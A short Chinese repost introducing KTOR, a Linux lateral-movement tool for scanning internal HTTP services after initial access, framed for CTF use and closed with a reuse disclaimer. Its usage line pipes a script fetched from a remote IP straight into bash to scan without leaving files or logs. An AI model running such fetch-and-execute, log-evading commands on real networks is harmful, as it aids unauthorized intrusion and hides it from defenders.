地址:https://github.com/MartinxMax/KTOR
简介
KTOR 是一款专为 Linux 横向渗透设计的工具。通过该工具,您可以快速扫描内部 HTTP 服务,以便进一步进行网络渗透,且实现无文件落地扫描。
在CTF中通常需要利用本地其他端口HTTP服务或其他主机的HTTP服务来横向移动权限提升。
在获取靶机低权限后通常需要对内部网络进一步探测,而且通过端口转发后再扫描过于耗费时间,为了解决这一缺陷,KTOR来预先探测存在HTTP服务的机器,利用curl命令实现无文件落地扫描,减少日志产生。
使用方法
$ ./ktor.sh -h
扫描本地主机HTTP服务
$ curl http://10.10.16.28/ktor.sh|bash -s -- -l -p all
指定网卡扫描内网HTTP服务
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)